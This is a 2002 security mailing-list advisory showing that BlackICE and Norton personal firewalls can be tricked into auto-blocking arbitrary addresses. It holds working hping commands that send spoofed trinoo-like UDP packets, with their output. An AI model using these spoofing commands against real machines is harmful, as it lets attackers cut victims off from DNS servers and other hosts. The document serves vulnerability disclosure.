Multiple Vendor PC firewall remote denial of services Vulnerability

From: Yiming Gong (yimingat_private)
Date: Mon Oct 07 2002 - 19:16:06 PDT

    Overview
    In a default installation, some personal firewall software will work
    with auto-block function on, and this time if you fake a high level
    dangerous attack packet with spoof address target these pc, these
    firewall will immediately block the spoofed ip address without any
    further judgement. Thus, an intruders might quickly block quite a great
    internet address for a victim pc remotely.

    Example
    I’ve test this on BlackICE and Norton personal firewall

    Below are the steps and result of the test on BlackICE,

    step 1:A clean and DEFAULT installation of  blackice defender for
    server(version 2.9.cap) on a win2k server
    pc,which ip address is ip.add.of.victim

    step 2:On a linux box with hping (a free soft can get from
    www.hping.org) installed,perform the following three
    commands:
    ---
    [root@]# hping -p 31335 -e PONG -2 ip.add.of.victim -c 5 -d 4 -a ip.add.
    of.dnsserver
    HPING ip.add.of.victim (eth0 ip.add.of.victim): udp mode set, 28 headers
    + 4 data bytes

    --- ip.add.of.victim hping statistic ---
    5 packets tramitted, 0 packets received, 100% packet loss
    round-trip min/avg/max = 0.0/0.0/0.0 ms
    [root@]# hping -p 31335 -e PONG -2 ip.add.of.victim -c 5 -d 4 -a
    www.google.com

    www.networkice.com
    HPING ip.add.of.victim (eth0 ip.add.of.victim): udp mode set, 28 headers
    + 4 data bytes

    --- ip.add.of.victim hping statistic ---
    5 packets tramitted, 0 packets received, 100% packet loss
    round-trip min/avg/max = 0.0/0.0/0.0 ms
    ---
    These three commands all do the same thing:send fake trinoo
    communication udp packet to our target machine
    ip.add.of.victim with spoofed ip adress. ( google,networkeice,and
    ip.add.of.dnsserver-our dns server)

    result:Each time the command executed,the blackice icon on the windows
    system tray flash,and an entries added
    in blackice 's Advanced Frirewall Settings automatically whick block all
    the packet of the spoofed
    address.And the spoofed ip address is unreachable immediately.

    The test steps and result of Norton personal firewall are almost the
    same, using  hping -e 13 -d 2 -s 6000 -p 2140 -2 ip.of.remote.victimpc
    -c 2 -a ip.of.spoofed.address instead.

    Vendor Response
    I’ve contacted symsecurityat_private and NSupportat_private on Sep 24,
    2002, Symantec told me they have forwarded my concerns on to the
    appropriate team, and BlackIce reply me As the product exists now, there
    is nothing that can be done to correct this.  And they are in the hopes
    that something can be done in a future release.

    Affected Versions:
    --
    I have test the following product

    BlackICE Defender for server version 2.9.cap
    BlackICE Server Protection version 3.5.cdf
    Norton personal firewall 2002 (version 4.0)
    All are vulnerable.

    --
    我要更好的生活

    Yiming Gong